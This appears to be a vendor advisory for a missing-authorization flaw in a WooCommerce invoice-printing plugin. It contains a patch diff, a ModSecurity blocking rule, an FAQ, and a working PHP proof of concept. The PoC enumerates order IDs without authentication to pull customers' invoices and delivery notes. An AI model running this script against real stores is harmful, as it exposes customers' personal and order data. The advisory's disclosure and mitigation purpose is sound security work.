+            $plugin_data      = get_file_data( $ordd_plugin_dir, array( 'domain' => 'Text Domain' ) );
             if ( ! empty( $plugin_data['domain'] ) ) {
-                $ts_plugin_domain = $plugin_data[ 'domain' ];
+                $ts_plugin_domain = $plugin_data['domain'];
             }
             return $ts_plugin_domain;
         }
@@ -108,12 +101,10 @@
 		/**
          * It will contain all the FAQ which need to be display on the FAQ page.
          * @return array $ts_faq All questions and answers.
-         *
+         *
          */
         public static function wcdn_get_faq () {
-
             $ts_faq = array ();
-
             $ts_faq = array(
                 1 => array (
                         'question' => 'It prints the 404 page instead of the order, how to correct that?',
--- a/woocommerce-delivery-notes/includes/wcdn-template-functions.php
+++ b/woocommerce-delivery-notes/includes/wcdn-template-functions.php
@@ -213,7 +213,7 @@
 	$template_type_option                                     = get_option( 'wcdn_template_type' );
 	$setting['template_setting']['template_setting_template'] = false !== $template_type_option ? $template_type_option : 'default';

-	if ( isset( $setting['template_setting']['template_setting_template'] ) && 'simple' == $setting['template_setting']['template_setting_template'] ) {
+	if ( isset( $setting['template_setting']['template_setting_template'] ) && 'simple' == $setting['template_setting']['template_setting_template'] ) { // phpcs:ignore
 		if ( 'order' === $template_type ) {
 			$turl = 'print-content.php'; // Apply this for 'order' template if it's 'simple'.
 		} else {
@@ -264,7 +264,7 @@
 /**
  * Show pdf logo html
  *
- * @param string $type pdf type.
+ * @param string $ttype pdf type.
  */
 function wcdn_pdf_company_logo( $ttype ) {
 	global $wcdn;
@@ -413,7 +413,7 @@
 				'color'       => $data['invoice_number']['invoice_number_text_colour'],
 				'active'      => 'yes',
 			);
-		} else {
+		} else { // phpcs:ignore
 			if ( 'invoice' === wcdn_get_template_type() || 'order' === wcdn_get_template_type() ) {
 				$fields['invoice_number'] = array(
 					'label' => __( 'Invoice Number', 'woocommerce-delivery-notes' ),
@@ -559,7 +559,7 @@
  * @param object $product Product Object.
  * @param object $order Order object.
  */
-function wcdn_additional_product_fields( $fields, $product, $order ) {
+function wcdn_additional_product_fields( $fields, $product, $order ) { // phpcs:ignore
 	$new_fields = array();

 	// Stock keeping unit.
@@ -579,7 +579,7 @@
  * @param object $order Order object.
  * @return boolean true
  */
-function wcdn_has_shipping_address( $order ) {
+function wcdn_has_shipping_address( $order ) { // phpcs:ignore
 	return true;
 }

@@ -715,7 +715,7 @@
  * @param array  $total_rows Rows array.
  * @param object $order Order object.
  */
-function wcdn_remove_semicolon_from_totals( $total_rows, $order ) {
+function wcdn_remove_semicolon_from_totals( $total_rows, $order ) { // phpcs:ignore
 	foreach ( $total_rows as $key => $row ) {
 		$label = $row['label'];
 		$colon = strrpos( $label, ':' );
@@ -733,7 +733,7 @@
  * @param array  $total_rows Rows array.
  * @param object $order Order object.
  */
-function wcdn_remove_payment_method_from_totals( $total_rows, $order ) {
+function wcdn_remove_payment_method_from_totals( $total_rows, $order ) { // phpcs:ignore
 	unset( $total_rows['payment_method'] );
 	unset( $total_rows['refund_0'] );
 	return $total_rows;
@@ -833,8 +833,8 @@
 	// Check if Product Input Field Lite is active.
 	$product_input_field = 'product-input-fields-for-woocommerce/product-input-fields-for-woocommerce.php';

-	if ( ( in_array( $product_input_field_pro, apply_filters( 'active_plugins', get_option( 'active_plugins', array() ) ) ) || ( is_multisite() && array_key_exists( $product_input_field_pro, get_site_option( 'active_sitewide_plugins', array() ) ) )
-	) || ( in_array( $product_input_field, apply_filters( 'active_plugins', get_option( 'active_plugins', array() ) ) ) || ( is_multisite() && array_key_exists( $product_input_field, get_site_option( 'active_sitewide_plugins', array() ) ) )
+	if ( ( in_array( $product_input_field_pro, apply_filters( 'active_plugins', get_option( 'active_plugins', array() ) ) ) || ( is_multisite() && array_key_exists( $product_input_field_pro, get_site_option( 'active_sitewide_plugins', array() ) ) ) // phpcs:ignore
+	) || ( in_array( $product_input_field, apply_filters( 'active_plugins', get_option( 'active_plugins', array() ) ) ) || ( is_multisite() && array_key_exists( $product_input_field, get_site_option( 'active_sitewide_plugins', array() ) ) ) // phpcs:ignore
 	) ) {

 		$pif_global_fields = $item->get_meta( '_alg_wc_pif_global', true );
@@ -1045,7 +1045,7 @@
  * @param WC_Order $order The WooCommerce order object.
  * @param array    $data  The checkout data.
  */
-function wcdn_add_guest_access_token_to_order( $order, $data ) {
+function wcdn_add_guest_access_token_to_order( $order, $data ) { // phpcs:ignore
 	if ( ! is_user_logged_in() ) {
 		wcdn_add_guest_access_token( $order );
 	}
--- a/woocommerce-delivery-notes/templates/pdf/simple/deliverynote/template.php
+++ b/woocommerce-delivery-notes/templates/pdf/simple/deliverynote/template.php
@@ -21,13 +21,13 @@
 		<div class="content">
 			<div class="page-header">
 			<?php
-				if ( isset( $data['company_logo']['active'] ) ) {
-					?>
+			if ( isset( $data['company_logo']['active'] ) ) {
+				?>
 					<div class="company-logo">
 						<?php
 						if ( wcdn_get_company_logo_id() ) :
 							?>
-							<?php wcdn_pdf_company_logo( $ttype = 'simple' ); ?>
+							<?php wcdn_pdf_company_logo( $ttype = 'simple' ); // phpcs:ignore?>
 						<?php endif; ?>
 					</div>
 				<?php } ?>
@@ -183,13 +183,11 @@
 					<thead>
 						<tr>
 							<th class="head-name"><span><?php esc_attr_e( 'Product', 'woocommerce-delivery-notes' ); ?></span></th>
-							<?php
-							if( isset( $data['display_price_product_table']['active'] ) ) { ?>
+							<?php if ( isset( $data['display_price_product_table']['active'] ) ) { ?>
 								<th class="head-item-price"><span><?php esc_attr_e( 'Price', 'woocommerce-delivery-notes' ); ?></span></th>
 							<?php } ?>
 							<th class="head-quantity"><span><?php esc_attr_e( 'Quantity', 'woocommerce-delivery-notes' ); ?></span></th>
-							<?php
-							if( isset( $data['display_price_product_table']['active'] ) ) { ?>
+							<?php if ( isset( $data['display_price_product_table']['active'] ) ) { ?>
 								<th class="head-price"><span><?php esc_attr_e( 'Total', 'woocommerce-delivery-notes' ); ?></span></th>
 							<?php } ?>
 						</tr>
@@ -227,8 +225,7 @@
 										<?php wcdn_get_product_name( $product, $order, $item ); ?>
 										<?php do_action( 'wcdn_order_item_after', $product, $order, $item ); ?>
 									</td>
-									<?php
-									if( isset( $data['display_price_product_table']['active'] ) ) { ?>
+									<?php if ( isset( $data['display_price_product_table']['active'] ) ) { ?>
 										<td class="product-item-price">
 											<span><?php echo wp_kses_post( wcdn_get_formatted_item_price( $order, $item ) ); ?></span>
 										</td>
@@ -236,8 +233,7 @@
 									<td class="product-quantity">
 										<span><?php echo esc_attr( apply_filters( 'wcdn_order_item_quantity', $adjusted_qty, $item ) ); ?></span>
 									</td>
-									<?php
-									if( isset( $data['display_price_product_table']['active'] ) ) { ?>
+									<?php if ( isset( $data['display_price_product_table']['active'] ) ) { ?>
 										<td class="product-price">
 											<span><?php echo wp_kses_post( $order->get_formatted_line_subtotal( $item ) ); ?></span>
 										</td>
--- a/woocommerce-delivery-notes/templates/pdf/simple/invoice/template.php
+++ b/woocommerce-delivery-notes/templates/pdf/simple/invoice/template.php
@@ -20,14 +20,10 @@
 	<body>
 		<div class="content">
 			<div class="page-header">
-			<?php
-				if ( isset( $data['company_logo']['active'] ) ) {
-					?>
+			<?php if ( isset( $data['company_logo']['active'] ) ) { ?>
 					<div class="company-logo">
-						<?php
-						if ( wcdn_get_company_logo_id() ) :
-							?>
-							<?php wcdn_pdf_company_logo( $ttype = 'simple' ); ?>
+						<?php if ( wcdn_get_company_logo_id() ) : ?>
+							<?php wcdn_pdf_company_logo( $ttype = 'simple' ); // phpcs:ignore?>
 						<?php endif; ?>
 					</div>
 				<?php } ?>
--- a/woocommerce-delivery-notes/templates/pdf/simple/receipt/template.php
+++ b/woocommerce-delivery-notes/templates/pdf/simple/receipt/template.php
@@ -22,14 +22,12 @@
 	<body>
 		<div class="content">
 			<div class="page-header">
-			<?php
-				if ( isset( $data['company_logo']['active'] ) ) {
-					?>
+			<?php if ( isset( $data['company_logo']['active'] ) ) { ?>
 					<div class="company-logo">
 						<?php
 						if ( wcdn_get_company_logo_id() ) :
 							?>
-							<?php wcdn_pdf_company_logo( $ttype = 'simple' ); ?>
+							<?php wcdn_pdf_company_logo( $ttype = 'simple' ); // phpcs:ignore?>
 						<?php endif; ?>
 					</div>
 				<?php } ?>
@@ -154,13 +152,12 @@

 					// Specify watermark text.
 					$text = $data['payment_received_stamp']['payment_received_stamp_text'];
-
 					?>
 					<div class="order-stamp-container">
-						<?php echo $text; ?>
+						<?php echo $text; // phpcs:ignore?>
 					</div>
 					<?php
-				}
+				}
 				?>
 				<ul class="info-list">
 					<?php
--- a/woocommerce-delivery-notes/templates/print-order/print-content.php
+++ b/woocommerce-delivery-notes/templates/print-order/print-content.php
@@ -19,7 +19,7 @@
 				if ( 'default' === $template_save ) {
 					wcdn_company_logo();
 				} elseif ( 'simple' === $template_save ) {
-					wcdn_pdf_company_logo( $ttype = 'simple' );
+					wcdn_pdf_company_logo( $ttype = 'simple' ); // phpcs:ignore
 				}
 			endif;
 			?>
@@ -154,7 +154,7 @@
 									</span>

 									<?php
-									$item_meta_fields = apply_filters( 'wcdn_product_meta_data', $item['item_meta'], $item  );
+									$item_meta_fields = apply_filters( 'wcdn_product_meta_data', $item['item_meta'], $item );
 									if ( null === $item_meta_fields ) {
 										$item_meta_fields = array();
 									}
@@ -166,7 +166,7 @@
 											$product_addons = WC_Product_Addons_Helper::get_product_addons( $product_id );
 										}
 									}
-                  // --- handle YITH add-ons: print labels and remove raw ywapo-* meta to avoid duplicates ---
+									// --- handle YITH add-ons: print labels and remove raw ywapo-* meta to avoid duplicates ---
 									$yith_addon_meta_map = array();
 									if ( isset( $item_meta_fields['_ywapo_meta_data'] ) && is_array( $item_meta_fields['_ywapo_meta_data'] ) ) {
 										foreach ( $item_meta_fields['_ywapo_meta_data'] as $group ) {
@@ -192,7 +192,7 @@
 										foreach ( $yith_addon_meta_map as $meta_key => $addon ) {
 											if ( isset( $addon['display_label'] ) && isset( $addon['display_value'] ) ) {
 												echo '<br><strong>' . esc_html( $addon['display_label'] ) . ' : </strong>' . wp_kses_post( $addon['display_value'] );
-											} else {
+											} else { // phpcs:ignore
 												if ( isset( $item_meta_fields[ $meta_key ] ) ) {
 													echo '<br><strong>' . esc_html( $meta_key ) . ' : </strong>' . wp_kses_post( $item_meta_fields[ $meta_key ] );
 												}
@@ -202,7 +202,7 @@
 											}
 										}
 									} // --- end handle YITH add-ons ---
-                  // Extra Product Options (ThemeComplete EPO) support.
+									// Extra Product Options (ThemeComplete EPO) support.
 									$epo_data = $item->get_meta( '_tmcartepo_data', true );
 									if ( ! empty( $epo_data ) && is_array( $epo_data ) ) {
 										foreach ( $epo_data as $epo ) {
--- a/woocommerce-delivery-notes/templates/print-order/simple/deliverynote/print-content.php
+++ b/woocommerce-delivery-notes/templates/print-order/simple/deliverynote/print-content.php
@@ -19,7 +19,7 @@
 			<?php
 			if ( wcdn_get_company_logo_id() ) :
 				?>
-				<?php wcdn_pdf_company_logo( $ttype = 'simple' ); ?>
+				<?php wcdn_pdf_company_logo( $ttype = 'simple' ); // phpcs:ignore?>
 			<?php endif; ?>
 		</div>
 	<?php } ?>
@@ -174,13 +174,11 @@
 		<thead>
 			<tr>
 				<th class="head-name"><span><?php esc_attr_e( 'Product', 'woocommerce-delivery-notes' ); ?></span></th>
-				<?php
-				if( isset( $data['display_price_product_table']['active'] ) ) { ?>
+				<?php if ( isset( $data['display_price_product_table']['active'] ) ) { ?>
 					<th class="head-item-price"><span><?php esc_attr_e( 'Price', 'woocommerce-delivery-notes' ); ?></span></th>
 				<?php } ?>
 				<th class="head-quantity"><span><?php esc_attr_e( 'Quantity', 'woocommerce-delivery-notes' ); ?></span></th>
-				<?php
-				if( isset( $data['display_price_product_table']['active'] ) ) { ?>
+				<?php if ( isset( $data['display_price_product_table']['active'] ) ) { ?>
 					<th class="head-price"><span><?php esc_attr_e( 'Total', 'woocommerce-delivery-notes' ); ?></span></th>
 				<?php } ?>
 			</tr>
@@ -218,8 +216,7 @@
 							<?php wcdn_get_product_name( $product, $order, $item ); ?>
 							<?php do_action( 'wcdn_order_item_after', $product, $order, $item ); ?>
 						</td>
-						<?php
-						if( isset( $data['display_price_product_table']['active'] ) ) { ?>
+						<?php if ( isset( $data['display_price_product_table']['active'] ) ) { ?>
 							<td class="product-item-price">
 								<span><?php echo wp_kses_post( wcdn_get_formatted_item_price( $order, $item ) ); ?></span>
 							</td>
@@ -227,8 +224,8 @@
 						<td class="product-quantity">
 							<span><?php echo esc_attr( apply_filters( 'wcdn_order_item_quantity', $adjusted_qty, $item ) ); ?></span>
 						</td>
-						<?php
-						if( isset( $data['display_price_product_table']['active'] ) ) { ?>
+						<?php
+						if( isset( $data['display_price_product_table']['active'] ) ) { // phpcs:ignore?>
 							<td class="product-price">
 								<span><?php echo wp_kses_post( $order->get_formatted_line_subtotal( $item ) ); ?></span>
 							</td>
@@ -291,8 +288,8 @@
 		?>
 		<style>
 			.order-thanks p {
-				color: <?php echo $data['complimentary_close']['complimentary_close_text_colour']; ?>;
-				font-size: <?php echo $data['complimentary_close']['complimentary_close_font_size']; ?>;
+				color: <?php echo $data['complimentary_close']['complimentary_close_text_colour']; // phpcs:ignore?>;
+				font-size: <?php echo $data['complimentary_close']['complimentary_close_font_size']; // phpcs:ignore?>;
 			}
 		</style>
 		<div class="personal_note">
@@ -308,8 +305,8 @@
 		?>
 		<style>
 			.colophon-policies p {
-				color: <?php echo $data['policies']['policies_text_colour']; ?>;
-				font-size: <?php echo $data['policies']['policies_font_size']; ?>;
+				color: <?php echo $data['policies']['policies_text_colour']; // phpcs:ignore?>;
+				font-size: <?php echo $data['policies']['policies_font_size']; // phpcs:ignore?>;
 			}
 		</style>
 		<div class="colophon-policies">
--- a/woocommerce-delivery-notes/templates/print-order/simple/invoice/print-content.php
+++ b/woocommerce-delivery-notes/templates/print-order/simple/invoice/print-content.php
@@ -20,7 +20,7 @@
 			<?php
 			if ( wcdn_get_company_logo_id() ) :
 				?>
-				<?php wcdn_pdf_company_logo( $ttype = 'simple' ); ?>
+				<?php wcdn_pdf_company_logo( $ttype = 'simple' ); // phpcs:ignore?>
 			<?php endif; ?>
 		</div>
 	<?php } ?>
@@ -275,8 +275,8 @@
 		?>
 		<style>
 			.order-thanks p {
-				color: <?php echo $data['complimentary_close']['complimentary_close_text_colour']; ?>;
-				font-size: <?php echo $data['complimentary_close']['complimentary_close_font_size']; ?>;
+				color: <?php echo $data['complimentary_close']['complimentary_close_text_colour']; // phpcs:ignore?>;
+				font-size: <?php echo $data['complimentary_close']['complimentary_close_font_size']; // phpcs:ignore?>;
 			}
 		</style>
 		<div class="personal_note">
@@ -292,8 +292,8 @@
 		?>
 		<style>
 			.colophon-policies p {
-				color: <?php echo $data['policies']['policies_text_colour']; ?>;
-				font-size: <?php echo $data['policies']['policies_font_size']; ?>;
+				color: <?php echo $data['policies']['policies_text_colour']; // phpcs:ignore?>;
+				font-size: <?php echo $data['policies']['policies_font_size']; // phpcs:ignore?>;
 			}
 		</style>
 		<div class="colophon-policies">
--- a/woocommerce-delivery-notes/templates/print-order/simple/receipt/print-content.php
+++ b/woocommerce-delivery-notes/templates/print-order/simple/receipt/print-content.php
@@ -22,7 +22,7 @@
 			<?php
 			if ( wcdn_get_company_logo_id() ) :
 				?>
-				<?php wcdn_pdf_company_logo( $ttype = 'simple'); ?>
+				<?php wcdn_pdf_company_logo( $ttype = 'simple'); // phpcs:ignore ?>
 			<?php endif; ?>
 		</div>
 	<?php } ?>
@@ -150,7 +150,7 @@

 		?>
 		<div class="order-stamp-container">
-			<?php echo $text; ?>
+			<?php echo $text; // phpcs:ignore?>
 		</div>
 		<?php
 	}
@@ -290,8 +290,8 @@
 		?>
 		<style>
 			.order-thanks p {
-				color: <?php echo $data['complimentary_close']['complimentary_close_text_colour']; ?>;
-				font-size: <?php echo $data['complimentary_close']['complimentary_close_font_size']; ?>;
+				color: <?php echo $data['complimentary_close']['complimentary_close_text_colour']; // phpcs:ignore?>;
+				font-size: <?php echo $data['complimentary_close']['complimentary_close_font_size']; // phpcs:ignore?>;
 			}
 		</style>
 		<div class="personal_note">
@@ -307,8 +307,8 @@
 		?>
 		<style>
 			.colophon-policies p {
-				color: <?php echo $data['policies']['policies_text_colour']; ?>;
-				font-size: <?php echo $data['policies']['policies_font_size']; ?>;
+				color: <?php echo $data['policies']['policies_text_colour']; // phpcs:ignore?>;
+				font-size: <?php echo $data['policies']['policies_font_size']; // phpcs:ignore?>;
 			}
 		</style>
 		<div class="colophon-policies">
--- a/woocommerce-delivery-notes/woocommerce-delivery-notes.php
+++ b/woocommerce-delivery-notes/woocommerce-delivery-notes.php
@@ -5,7 +5,7 @@
  * Plugin Name: Print Invoice & Delivery Notes for WooCommerce
  * Plugin URI: https://www.tychesoftwares.com/
  * Description: Print Invoices & Delivery Notes for WooCommerce Orders.
- * Version: 5.9.0
+ * Version: 6.0.0
  * Author: Tyche Softwares
  * Author URI: https://www.tychesoftwares.com/
  * License: GPLv3 or later
@@ -60,7 +60,7 @@
 	 */
 	add_action(
 		'before_woocommerce_init',
-		function() {
+		function () {
 			if ( class_exists( AutomatticWooCommerceUtilitiesFeaturesUtil::class ) ) {
 				AutomatticWooCommerceUtilitiesFeaturesUtil::declare_compatibility( 'custom_order_tables', 'woocommerce-delivery-notes/woocommerce-delivery-notes.php', true );
 				AutomatticWooCommerceUtilitiesFeaturesUtil::declare_compatibility( 'orders_cache', 'woocommerce-delivery-notes/woocommerce-delivery-notes.php', true );

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2026-25317
SecRule REQUEST_URI "@rx ^/(?:index.php)?" 
  "id:100025317,phase:2,deny,status:403,chain,msg:'CVE-2026-25317 - Print Invoice & Delivery Notes for WooCommerce Missing Authorization Exploit Attempt',severity:'CRITICAL',tag:'CVE-2026-25317',tag:'WordPress',tag:'WooCommerce',tag:'Plugin/Print-Invoice-Delivery-Notes'"
  SecRule ARGS_GET:action "@streq print" "chain"
    SecRule ARGS_GET:print-order "@rx ^[0-9]+$" "chain"
      SecRule &ARGS_GET:guest_token "@eq 0" 
        "t:none,setvar:'tx.cve_2026_25317_score=+%{tx.critical_anomaly_score}',setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-25317 - Print Invoice & Delivery Notes for WooCommerce <= 5.9.0 - Missing Authorization
<?php

$target_url = 'https://vulnerable-site.com';

// Function to test order ID enumeration
function test_order_id($order_id) {
    global $target_url;
    
    // Construct the exploit URL
    $url = $target_url . '/?print-order=' . $order_id . '&action=print';
    
    // Initialize cURL
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
    
    // Set headers to mimic a regular browser request
    $headers = [
        'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
        'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        'Accept-Language: en-US,en;q=0.5',
        'Connection: keep-alive',
    ];
    curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
    
    // Execute the request
    $response = curl_exec($ch);
    $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    
    curl_close($ch);
    
    // Check if the request was successful and contains order data
    if ($http_code == 200) {
        // Look for indicators of a successful order document
        if (strpos($response, 'order-details') !== false || 
            strpos($response, 'invoice') !== false || 
            strpos($response, 'delivery-note') !== false ||
            strpos($response, 'order-number') !== false) {
            return ['success' => true, 'order_id' => $order_id, 'url' => $url];
        }
    }
    
    return ['success' => false, 'order_id' => $order_id];
}

// Test a range of order IDs (common in WooCommerce installations)
echo "Testing order ID enumeration on: $target_urlnn";

$found_orders = [];

// Test common order ID ranges
for ($i = 1; $i <= 100; $i++) {
    $result = test_order_id($i);
    
    if ($result['success']) {
        echo "[+] FOUND VULNERABLE ORDER: ID {$result['order_id']}n";
        echo "    Exploit URL: {$result['url']}nn";
        $found_orders[] = $result;
    } else {
        echo "."; // Progress indicator
    }
    
    // Small delay to avoid rate limiting
    usleep(100000); // 0.1 second
}

// Summary
echo "nn=== SUMMARY ===n";
echo "Tested order IDs: 1-100n";
echo "Vulnerable orders found: " . count($found_orders) . "n";

if (count($found_orders) > 0) {
    echo "nTo retrieve specific document types, append &print-order-type= to the URL:n";
    echo "  &print-order-type=invoice      - For invoice documentn";
    echo "  &print-order-type=delivery-note - For delivery noten";
    echo "  &print-order-type=receipt      - For receiptn";
    echo "  &print-order-type=order        - For order summaryn";
}

?>

Frequently Asked Questions

What is CVE-2026-25317?
Overview of the vulnerability
CVE-2026-25317 is a medium severity vulnerability in the Print Invoice & Delivery Notes for WooCommerce plugin for WordPress. It is caused by a missing authorization check, allowing unauthenticated attackers to access sensitive order documents without proper validation.
How does this vulnerability work?
Mechanics of the exploit
The vulnerability allows attackers to send a specially crafted GET request with parameters like ‘print-order’ and ‘action’ to access order documents. The lack of authorization checks for frontend requests means that anyone can retrieve invoices and delivery notes without being logged in.
Who is affected by this vulnerability?
Identifying vulnerable installations
Any WordPress site using the Print Invoice & Delivery Notes for WooCommerce plugin version 5.9.0 or earlier is affected. Administrators should check their plugin version to determine if they need to take action.
How can I check if my site is vulnerable?
Verifying plugin versions
To check if your site is vulnerable, log in to your WordPress admin dashboard, navigate to the Plugins section, and look for the Print Invoice & Delivery Notes plugin. If the version is 5.9.0 or earlier, your site is at risk.
How can I fix this vulnerability?
Updating the plugin
The vulnerability is patched in version 6.0.0 of the plugin. To fix the issue, update the Print Invoice & Delivery Notes for WooCommerce plugin to the latest version from the WordPress plugin repository.
What if I cannot update the plugin immediately?
Mitigation strategies
If immediate updates are not possible, consider temporarily disabling the plugin to prevent unauthorized access. Additionally, review access controls and monitor logs for any suspicious activity related to order document access.
What does the CVSS score of 5.3 mean?
Understanding risk levels
A CVSS score of 5.3 indicates a medium severity vulnerability. This means that while it does not allow for data modification or deletion, it poses a significant risk of unauthorized access to sensitive customer information, which could lead to privacy violations.
What kind of data can be accessed through this vulnerability?
Sensitive information at risk
Exploitation of this vulnerability can expose sensitive customer data such as names, billing and shipping addresses, email addresses, phone numbers, and details of purchased items. This information is critical and could be misused for malicious purposes.
How does the proof of concept demonstrate the vulnerability?
Exploit demonstration
The proof of concept shows how an attacker can enumerate order IDs by sending crafted GET requests to the vulnerable endpoint. It illustrates the ease of accessing sensitive documents without any authentication, highlighting the severity of the issue.
What should I do if I suspect my site has been exploited?
Responding to potential breaches
If you suspect exploitation, immediately review your server logs for unauthorized access attempts. Change any compromised credentials, notify affected customers, and consider consulting a security professional for a thorough investigation.
Are there any additional security measures I should take?
Enhancing overall security
In addition to updating the plugin, consider implementing security measures such as web application firewalls (WAF), regular security audits, and user access controls to minimize the risk of future vulnerabilities.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations